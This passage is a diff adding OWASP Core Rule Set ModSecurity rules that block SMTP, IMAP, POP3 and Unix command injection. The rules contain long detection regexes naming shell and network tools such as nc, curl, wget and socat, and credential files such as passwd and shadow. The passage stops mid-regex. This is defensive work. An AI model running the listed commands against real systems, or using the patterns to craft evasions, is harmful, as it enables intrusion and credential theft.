+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \r\n(?s:.)*?\b(?:(?i:E)(?:HLO [\--\.A-Za-z\x17f\x212a]{1,255}|XPN .{1,64})|HELO [\--\.A-Za-z\x17f\x212a]{1,255}|MAIL FROM:<.{1,64}(?i:@).{1,255}(?i:>)|(?i:R)(?:CPT TO:(?:(?i:<).{1,64}(?i:@).{1,255}(?i:>)|(?i: ))?(?i:<).{1,64}(?i:>)|SET\b)|VRFY .{1,64}(?: <.{1,64}(?i:@).{1,255}(?i:>)|(?i:@).{1,255})|AUTH [\-0-9A-Z_a-z\x17f\x212a]{1,20}(?i: )(?:(?:[\+/-9A-Z_a-z\x17f\x212a]{4})*(?:[\+/-9A-Z_a-z\x17f\x212a]{2}(?i:=)|[\+/-9A-Z_a-z\x17f\x212a]{3}))?(?i:=)|STARTTLS\b|NOOP\b(?:(?i: ).{1,255})?)" \
+ "id:932300,\
+ phase:2,\
+ block,\
+ t:none,t:escapeSeqDecode,\
+ msg:'Remote Command Execution: SMTP Command Execution',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'platform-multi',\
+ tag:'attack-rce',\
+ tag:'paranoia-level/2',\
+ tag:'OWASP_CRS',\
+ tag:'capec/137/134',\
+ tag:'PCI/6.5.2',\
+ ver:'OWASP_CRS/4.0.0',\
+ severity:'CRITICAL',\
+ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
+
+# =[ IMAP Command Execution ]=
+#
+# This rule prevents execution of IMAP4 related system commands.
+#
+# List of IMAP4 commands: from rfc 3501 (https://datatracker.ietf.org/doc/html/rfc3501#section-9)
+#
+# Note: Mailbox International Naming Convention uses UTF-7, so it was left out explicitly.
+#
+# Regular expression generated from regex-assembly/932310.ra.
+# To update the regular expression run the following shell script
+# (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
+# crs-toolchain regex update 932310
+#
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?is)\r\n[0-9A-Z_a-z]{1,50}\b (?:A(?:PPEND (?:[\"-#%-&\*\--9A-Z\x5c_a-z]+)?(?: \([ \x5ca-z]+\))?(?: \"?[0-9]{1,2}-[0-9A-Z_a-z]{3}-[0-9]{4} [0-9]{2}:[0-9]{2}:[0-9]{2} [\+\-][0-9]{4}\"?)? \{[0-9]{1,20}\+?\}|UTHENTICATE [\-0-9_a-z]{1,20}\r\n)|L(?:SUB (?:[\"-#\*\.-9A-Z_a-z~]+)? (?:[\"%-&\*\.-9A-Z\x5c_a-z]+)?|ISTRIGHTS (?:[\"%-&\*\--9A-Z\x5c_a-z]+)?)|S(?:TATUS (?:[\"%-&\*\--9A-Z\x5c_a-z]+)? \((?:U(?:NSEEN|IDNEXT)|MESSAGES|UIDVALIDITY|RECENT| )+\)|ETACL (?:[\"%-&\*\--9A-Z\x5c_a-z]+)? [\+\-][ac-eik-lpr-tw-x]+?)|UID (?:COPY|FETCH|STORE) (?:[\*,0-:]+)?|(?:(?:DELETE|GET)ACL|MYRIGHTS) (?:[\"%-&\*\--9A-Z\x5c_a-z]+)?)" \
+ "id:932310,\
+ phase:2,\
+ block,\
+ t:none,t:escapeSeqDecode,\
+ msg:'Remote Command Execution: IMAP Command Execution',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'platform-multi',\
+ tag:'attack-rce',\
+ tag:'paranoia-level/2',\
+ tag:'OWASP_CRS',\
+ tag:'capec/137/134',\
+ tag:'PCI/6.5.2',\
+ ver:'OWASP_CRS/4.0.0',\
+ severity:'CRITICAL',\
+ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
+
+# =[ POP3 Command Execution ]=
+#
+# This rule prevents execution of POP3 related system commands.
+#
+# List of POP3 commands:
+# - from rfc 1939 (https://www.rfc-editor.org/rfc/rfc1939#appendix-B)
+# - extensions from rfc 2449 (https://www.rfc-editor.org/rfc/rfc2449)
+#
+# These commands all have some kind of parameter that makes them a good PL2 target.
+#
+# Regular expression generated from regex-assembly/932320.ra.
+# To update the regular expression run the following shell script
+# (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
+# crs-toolchain regex update 932320
+#
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?is)\r\n.*?\b(?:(?:LIST|TOP [0-9]+)(?: [0-9]+)?|U(?:SER .+?|IDL(?: [0-9]+)?)|PASS .+?|(?:RETR|DELE) [0-9]+?|A(?:POP [0-9A-Z_a-z]+ [0-9a-f]{32}|UTH [\-0-9A-Z_]{1,20} (?:(?:[\+/-9A-Z_a-z]{4})*(?:[\+/-9A-Z_a-z]{2}=|[\+/-9A-Z_a-z]{3}))?=))" \
+ "id:932320,\
+ phase:2,\
+ block,\
+ t:none,t:escapeSeqDecode,\
+ msg:'Remote Command Execution: POP3 Command Execution',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'platform-multi',\
+ tag:'attack-rce',\
+ tag:'paranoia-level/2',\
+ tag:'OWASP_CRS',\
+ tag:'capec/137/134',\
+ tag:'PCI/6.5.2',\
+ ver:'OWASP_CRS/4.0.0',\
+ severity:'CRITICAL',\
+ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
+
+
+# [ Unix command injection ]
+#
+# This is a stricter sibling of rules 932230, 932235, 932250, 932260.
+# This stricter sibling detects Unix RCE with and without prefix and words of any length.
+# It uses the same regex.
+#
+# Rule relations:
+#
+# .932230 (base rule, PL1, targets prefix + two and three character commands)
+# ..932231 (stricter sibling, PL2, targets prefix + the source shortcut command)
+# ..932232 (stricter sibling, PL3, targets prefix + additional command words)
+# .932235 (base rule, PL1, targets prefix + known command word of length > 3 without evasion)
+#
+# .932250 (base rule, PL1, targets two and three character commands)
+# .932260 (base rule, PL1, targets known command word of length > 3 without evasion)
+#
+# .932240 (generic detection, PL2, targets generic evasion attempts)
+# .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2,
+# - with and without prefix
+# - words of any length)
+# ..932239 (sibling of 932236, PL2,
+# - with and without prefix
+# - words of any length
+# - targets request headers user-agent and referer only
+# - excluded words: known user-agents)
+# ..932238 (stricter sibling of 932236, PL3,
+# - no excluded words)
+# .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3,
+# - targets request headers user-agent and referer only
+# - without prefix
+# - with word boundaries
+# - words of any length
+# - excluded words: known user-agents)
+#
+#
+# Regular expression generated from regex-assembly/932236.ra.
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932236 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:^|b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?y[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?x|c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?v|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?l)|[ls][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9
\?-@_a-\{]*)?\x5c?h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t)?|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|<(?:\(|<<)|>\(|\([\s\v]*\))[\s\v]*(?:[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7z[arx]?|(?:(?:GE|POS)T|HEAD)[\s\v&\)<>\|]|a(?:(?:b|w[ks]|l(?:ias|pine)|xel)[\s\v&\)<>\|]|pt(?:[\s\v&\)<>\|]|-get)|r(?:[\s\v&\)<>j\|]|(?:p|ch)[\s\v&\)<>\|]|ia2c)|s(?:h[\s\v&\)<>\|]|cii(?:-xfr|85)|pell)|dd(?:group|user)|getty|nsible-playbook|tobm)|b(?:z(?:z[\s\v&\)<>\|]|c(?:at|mp)|diff|e(?:grep|xe)|f?grep|ip2(?:recover)?|less|more)|a(?:s(?:e(?:32|64|n(?:ame[\s\v&\)<>\|]|c))|h[\s\v&\)<>\|])|tch[\s\v&\)<>\|])|lkid|pftrace|r(?:eaksw|idge[\s\v&\)<>\|])|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler[\s\v&\)<>\|]|zip2)|s(?:ctl|ybox))|y(?:ebug|obu))|c(?:[8-9]9|(?:a(?:t|ncel|psh)|c)[\s\v&\)<>\|]|mp|p(?:[\s\v&\)<>\|]|an|io|ulimit)|s(?:h|plit|vtool)|u(?:(?:t|rl)[\s\v&\)<>\|]|psfilter)|ertbot|h(?:attr|(?:dir|root)[\s\v&\)<>\|]|eck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|(?:flag|pas)s|g(?:passwd|rp)|mod|o(?:om|wn)|sh)|lang(?:[\s\v&\)<>\|]|\+\+)|o(?:(?:
b|pro)c|(?:lumn|m(?:m(?:and)?|p(?:oser|ress)))[\s\v&\)<>\|]|w(?:say|think))|r(?:ash[\s\v&\)<>\|]|on(?:tab)?))|d(?:(?:[du]|i(?:(?:alo)?g|r|ff)|a(?:sh|te))[\s\v&\)<>\|]|f|hclient|m(?:esg|idecode|setup)|o(?:as|(?:cker|ne)[\s\v&\)<>\|]|sbox)|pkg|vips)|e(?:(?:[bd]|cho)[\s\v&\)<>\|]|n(?:v(?:[\s\v&\)<>\|]|-update)|d(?:if|sw))|qn|s(?:[\s\v&\)<>h\|]|ac)|x(?:(?:ec)?[\s\v&\)<>\|]|iftool|p(?:(?:and|(?:ec|or)t)[\s\v&\)<>\|]|r))|2fsck|(?:asy_instal|va)l|fax|grep|macs)|f(?:(?:c|etch|lock|unction)[\s\v&\)<>\|]|d|g(?:rep)?|i(?:(?:n(?:d|ger)|sh)?[\s\v&\)<>\|]|le(?:[\s\v&\)<>\|]|test))|mt|tp(?:[\s\v&\)<>\|]|stats|who)|acter|o(?:ld[\s\v&\)<>\|]|reach)|ping)|g(?:c(?:c[^\s\v]|ore)|db|e(?:(?:m|tfacl)[\s\v&\)<>\|]|ni(?:e[\s\v&\)<>\|]|soimage))|hci?|i(?:(?:t|mp)[\s\v&\)<>\|]|nsh)|(?:o|awk)[\s\v&\)<>\|]|pg|r(?:c|ep[\s\v&\)<>\|]|oup(?:[\s\v&\)<>\|]|mod))|tester|unzip|z(?:cat|exe|ip))|h(?:(?:d|up|ash|i(?:ghlight|story))[\s\v&\)<>\|]|e(?:ad[\s\v&\)<>\|]|xdump)|ost(?:id|name)|ping3|t(?:digest|op|passwd))|i(?:d|p(?:6?tables|config)?|rb|conv|f(?:config|top)|nstall[\s\v&\)<>\|]|onice|spell)|j(?:js|q|ava[\s\v&\)<>\|]|exec|o(?:(?:bs|in)[\s\v&\)<>\|]|urnalctl)|runscript)|k(?:s(?:h|shell)|ill(?:[\s\v&\)<>\|]|all)|nife[\s\v&\)<>\|])|l(?:d(?:d?[\s\v&\)<>\|]|config)|(?:[np]|inks|ynx)[\s\v&\)<>\|]|s(?:-F|b_release|cpu|hw|mod|of|pci|usb)?|ua(?:[\s\v&\)<>\|]|(?:la)?tex)|z(?:[\s\v&\)4<>\|]|4c(?:at)?|c(?:at|mp)|diff|[e-f]?grep|less|m(?:a(?:dec|info)?|ore))|a(?:st(?:[\s\v&\)<>\|]|comm|log(?:in)?)|tex[\s\v&\)<>\|])|ess(?:[\s\v&\)<>\|]|echo|(?:fil|pip)e)|ftp(?:get)?|o(?:(?:ca(?:l|te)|ok)[\s\v&\)<>\|]|g(?:inctl|(?:nam|sav)e)|setup)|trace|wp-(?:d(?:ownload|ump)|mirror|request))|m(?:a(?:(?:n|ke)[\s\v&\)<>\|]|il(?:[\s\v&\)<>q\|]|x[\s\v&\)<>\|])|ster\.passwd|wk)|tr|(?:v|utt)[\s\v&\)<>\|]|k(?:dir[\s\v&\)<>\|]|fifo|nod|temp)|locate|o(?:squitto|unt[\s\v&\)<>\|])|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|ysql(?:admin|dump(?:slow)?|hotcopy|show)?)|n(?:c(?:[\s\v&\)<>\|]|\.(?:openbsd|traditional)|at)|e(?:t(?:[\s\v&\)<>\|]|(
?:c|st)at|kit-ftp|plan)|ofetch)|(?:(?:ul)?l|ice)[\s\v&\)<>\|]|m(?:[\s\v&\)<>\|]|ap)|p(?:m[\s\v&\)<>\|]|ing)|a(?:no[\s\v&\)<>\|]|sm|wk)|o(?:de[\s\v&\)<>\|]|hup)|roff|s(?:enter|lookup|tat))|o(?:(?:d|ctave)[\s\v&\)<>\|]|nintr|p(?:en(?:ssl|v(?:pn|t))|kg))|p(?:a(?:(?:x|rted|tch)[\s\v&\)<>\|]|s(?:swd|te[\s\v&\)<>\|]))|d(?:b|f(?:la)?tex|ksh)|f(?:[\s\v&\)<>\|]|tp)|g(?:rep)?|hp(?:[\s\v&\)57<>\|]|-cgi)|i(?:(?:co?|ng)[\s\v&\)<>\|]|p[^\s\v]|dstat|gz)|k(?:g(?:_?info)?|exec|ill)|r(?:y?[\s\v&\)<>\|]|int(?:env|f[\s\v&\)<>\|]))|t(?:x|ar(?:diff|grep)?)|wd(?:\.db)?|xz|er(?:(?:f|ms)[\s\v&\)<>\|]|l(?:[\s\v&\)5<>\|]|sh))|opd|s(?:ed|ftp|ql)|u(?:ppet[\s\v&\)<>\|]|shd)|y(?:thon[^\s\v]|3?versions))|r(?:a(?:r[\s\v&\)<>\|]|k(?:e[\s\v&\)<>\|]|u))|c(?:p[\s\v&\)<>\|])?|e(?:(?:d(?:carpet)?|v|name|p(?:eat|lace))[\s\v&\)<>\|]|a(?:delf|lpath)|stic)|m(?:(?:dir)?[\s\v&\)<>\|]|user)|pm(?:[\s\v&\)<>\|]|db|(?:quer|verif)y)|bash|l(?:ogin|wrap)|nano|oute[\s\v&\)<>\|]|sync|u(?:by[^\s\v]|n-(?:mailcap|parts))|vi(?:ew|m))|s(?:c(?:p|hed|r(?:een|ipt)[\s\v&\)<>\|])|e(?:(?:d|lf|rvice)[\s\v&\)<>\|]|t(?:(?:facl)?[\s\v&\)<>\|]|arch|env|sid)|ndmail)|(?:g|ash|nap)[\s\v&\)<>\|]|h(?:(?:adow|ells)?[\s\v&\)<>\|]|\.distrib|u(?:f|tdown[\s\v&\)<>\|]))|s(?:[\s\v&\)<>\|]|h(?:[\s\v&\)<>\|]|-key(?:ge|sca)n|pass))|u(?:[\s\v&\)<>\|]|do)|vn|diff|ftp|l(?:eep[\s\v&\)<>\|]|sh)|mbclient|o(?:cat|elim|(?:rt|urce)[\s\v&\)<>\|])|p(?:lit[\s\v&\)<>\|]|wd\.db)|qlite3|t(?:art-stop-daemon|d(?:buf|err|in|out)|r(?:ace|ings[\s\v&\)<>\|]))|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:c|r[\s\v&\)<>\|]|il[\s\v&\)<>f\|]|sk(?:[\s\v&\)<>\|]|set))|bl|c(?:p(?:[\s\v&\)<>\|]|dump|ing|traceroute)|l?sh)|e(?:[ex][\s\v&\)<>\|]|lnet)|i(?:c[\s\v&\)<>\|]|me(?:datectl|out[\s\v&\)<>\|]))|o(?:p|uch[\s\v&\)<>\|])|ftp|mux|r(?:aceroute6?|off)|shark)|u(?:dp|l(?:imit)?[\s\v&\)<>\|]|n(?:ame|(?:compress|s(?:et|hare))[\s\v&\)<>\|]|expand|iq|l(?:ink[\s\v&\)<>\|]|z(?:4|ma))|(?:pig|x)z|rar|z(?:ip[\s\v&\)<>\|]|std))|pdate-alternatives|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:i(?:m(?:[
\s\v&\)<>\|]|diff)|ew[\s\v&\)<>\|]|gr|pw|rsh)|algrind|olatility[\s\v&\)<>\|])|w(?:3m|c|a(?:ll|tch)[\s\v&\)<>\|]|get|h(?:iptail[\s\v&\)<>\|]|o(?:ami|is))|i(?:reshark|sh[\s\v&\)<>\|]))|x(?:(?:x|pa)d|z(?:[\s\v&\)<>\|]|c(?:at|mp)|d(?:ec|iff)|[e-f]?grep|less|more)|args|e(?:la)?tex|mo(?:dmap|re)|term)|y(?:(?:e(?:s|lp)|arn)[\s\v&\)<>\|]|um)|z(?:ip(?:[\s\v&\)<>\|]|c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|s(?:h|oelim|td(?:(?:ca|m)t|grep|less)?)|athura|c(?:at|mp)|diff|e(?:grep|ro[\s\v&\)<>\|])|f?grep|less|more|run|ypper))" \ + "id:932236,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Unix Command Injection (command without evasion)',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# [ Unix command injection ] +# +# This is a sibling of rule 932236. +# This sibling detects Unix RCE in request headers Referer and User-Agent. +# It uses the same regex but excludes known user-agents to avoid false positives. 
+#
+# Rule relations:
+#
+# .932230 (base rule, PL1, targets prefix + two and three character commands)
+# ..932231 (stricter sibling, PL2, targets prefix + the source shortcut command)
+# ..932232 (stricter sibling, PL3, targets prefix + additional command words)
+# .932235 (base rule, PL1, targets prefix + known command word of length > 3 without evasion)
+#
+# .932250 (base rule, PL1, targets two and three character commands)
+# .932260 (base rule, PL1, targets known command word of length > 3 without evasion)
+#
+# .932240 (generic detection, PL2, targets generic evasion attempts)
+# .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2,
+# - with and without prefix
+# - words of any length)
+# ..932239 (sibling of 932236, PL2,
+# - with and without prefix
+# - words of any length
+# - targets request headers user-agent and referer only
+# - excluded words: known user-agents)
+# ..932238 (stricter sibling of 932236, PL3,
+# - no excluded words)
+# .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3,
+# - targets request headers user-agent and referer only
+# - without prefix
+# - with word boundaries
+# - words of any length
+# - excluded words: known user-agents)
+#
+#
+#
+# Regular expression generated from regex-assembly/932239.ra.
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932239 +# +SecRule REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent "@rx (?i)(?:^|b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?y[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?x|c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?v|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?l)|[ls][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h[\"'\)\[-\x5c]*(
?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t)?|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|<(?:\(|<<)|>\(|\([\s\v]*\))[\s\v]*(?:[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7z